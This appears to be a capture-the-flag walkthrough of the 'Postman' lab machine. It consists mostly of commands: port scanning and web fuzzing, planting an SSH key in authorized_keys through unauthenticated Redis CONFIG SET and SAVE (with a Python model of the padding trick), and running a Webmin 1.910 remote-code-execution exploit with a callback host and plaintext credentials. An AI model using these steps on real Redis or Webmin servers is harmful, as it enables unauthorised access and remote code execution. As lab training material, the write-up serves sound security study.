nmap -A -p- -oA output 10.129.2.1 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA postman 10.129.2.1

nmap -sU -O -p- -oA postman-udp 10.129.2.1

nikto -h 10.129.2.1:80


redis-cli -h 10.129.2.1

config get dir

config set dir "/etc/"

config set dir "/var/lib/redis"


http://10.129.2.1/js


https://10.129.2.1:10000


We see a Webmin login page, but without credentials we can't get past it.


searchsploit webmin


wfuzz -c --hc=404 -w /SecLists/Discovery/Web-Content/IIS.fuzz.txt http://10.129.2.1/FUZZ


http://10.129.2.1/upload


openssl s_client -connect 10.129.2.1:10000


In the certificate served on port 10000 we find an e-mail address, root@Postman.


config set dir "/var/lib/redis/.ssh"

config set dbfilename authorized_keys

ssh-keygen

This didn't work for me.


https://github.com/NaveenNguyen/Webmin-1.910-Package-Updates-RCE/blob/master/exploit_poc.py

The value has to be in the keyspace before the dump is written, so store the padded public key first (key is id_rsa.pub with a few blank lines before and after it, so the RDB bytes on either side of it land on their own lines and sshd still finds a clean key line):

cat key | redis-cli -h 10.129.2.1 -x set 1

Then, with dir pointing at the redis user's .ssh directory (/var/lib/redis/.ssh), name the dump file authorized_keys and save:

redis-cli -h 10.129.2.1

config set dbfilename authorized_keys

save
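The two things that decide whether this works are the command order (SET before SAVE) and the newline padding around the key. The following is an added example, not code from the original write-up: it never talks to a server. It encodes the RESP frames redis-cli sends, fakes the RDB bytes that SAVE writes around the stored value, and runs a minimal sshd-style authorized_keys parser over the result. The demo public key, the RDB prefix/trailer bytes and the parser are all constructed stand-ins; only the framing logic is the real technique.

```python
"""Model of the Redis -> authorized_keys write used above.

Added example, not code from the original write-up. Nothing here talks to a
server: it encodes the commands redis-cli would send, fakes the RDB bytes that
SAVE writes around the stored value, and runs a minimal sshd-style parser
over the result to show why the key must be padded with newlines and why
SET has to happen before SAVE.
"""
import base64
import binascii
import struct

KEY_TYPES = {b"ssh-rsa", b"ssh-ed25519", b"ecdsa-sha2-nistp256"}

# Constructed demo key: a real public key blob starts with its length-prefixed
# type string, so we mimic that and fill the rest with placeholder bytes.
_BLOB = struct.pack(">I", 7) + b"ssh-rsa" + b"demo-not-a-real-key"
DEMO_PUBKEY = b"ssh-rsa " + base64.b64encode(_BLOB) + b" attacker@kali"

# Illustrative stand-ins for the RDB bytes SAVE puts before and after a value
# (magic + one aux field + db selector + a string key "1"). The exact layout
# is not the point; the binary on both sides of the value is.
RDB_PREFIX = b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\xfb\x01\x00\x00\x011"
RDB_TRAILER = b"\xff\x8f\x12\xd4\x0c\x02\x9e\x1b\x3b"  # EOF opcode + fake CRC64


def resp_command(*args: bytes) -> bytes:
    """Encode one command as a RESP array, the way redis-cli sends it."""
    frame = b"*%d\r\n" % len(args)
    for arg in args:
        frame += b"$%d\r\n%s\r\n" % (len(arg), arg)
    return frame


def pad_key(pubkey: bytes) -> bytes:
    """Equivalent of: (echo -e "\\n\\n"; cat id_rsa.pub; echo -e "\\n\\n") > key"""
    return b"\n\n\n" + pubkey + b"\n\n\n"


def attack_frames(pubkey: bytes, ssh_dir: bytes = b"/var/lib/redis/.ssh") -> list:
    """The four commands in the order that works: the value must be in the
    keyspace before SAVE, otherwise authorized_keys is written without it."""
    return [
        resp_command(b"SET", b"1", pad_key(pubkey)),
        resp_command(b"CONFIG", b"SET", b"dir", ssh_dir),
        resp_command(b"CONFIG", b"SET", b"dbfilename", b"authorized_keys"),
        resp_command(b"SAVE"),
    ]


def _rdb_len(n: int) -> bytes:
    """RDB length encoding for the sizes that matter here (< 16384 bytes)."""
    return bytes([n]) if n < 64 else bytes([0x40 | (n >> 8), n & 0xFF])


def fake_rdb(value: bytes) -> bytes:
    """Approximate bytes of the file SAVE writes for a db holding one string value."""
    return RDB_PREFIX + _rdb_len(len(value)) + value + RDB_TRAILER


def _blob_type(blob: bytes) -> bytes:
    """First length-prefixed string of a key blob, i.e. its type name."""
    if len(blob) < 4:
        return b""
    n = struct.unpack(">I", blob[:4])[0]
    return blob[4:4 + n]


def accepted_keys(authorized_keys: bytes) -> list:
    """Minimal model of sshd's authorized_keys scan: one key per line; a line
    whose first token is not a key type would be parsed as options and, since
    RDB junk is not a valid option, dropped. Returns the accepted base64 blobs."""
    found = []
    for line in authorized_keys.split(b"\n"):
        parts = line.strip().split()
        if not parts or parts[0].startswith(b"#") or parts[0] not in KEY_TYPES:
            continue
        try:
            blob = base64.b64decode(parts[1], validate=True)
        except (IndexError, binascii.Error):
            continue
        if _blob_type(blob) == parts[0]:
            found.append(parts[1])
    return found


if __name__ == "__main__":
    for label, value in (("unpadded", DEMO_PUBKEY), ("padded", pad_key(DEMO_PUBKEY))):
        print(f"{label}: sshd would accept {len(accepted_keys(fake_rdb(value)))} key(s)")
    for frame in attack_frames(DEMO_PUBKEY):
        print(frame[:40])
```

Without the padding the key shares its line with the RDB header, so the first token sshd sees is not a key type and the line is discarded; with it, the junk ends up on its own lines and the key line parses cleanly. The frame list also makes the ordering explicit: SAVE is last.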


python3 exploit_poc.py --ip_address=10.129.2.1 --port=10000 --lhost=10.10.14.135 --lport=443 --user=Matt --pass=computer2008


whoami



copyright©2022 Cu3rv0x all rights reserved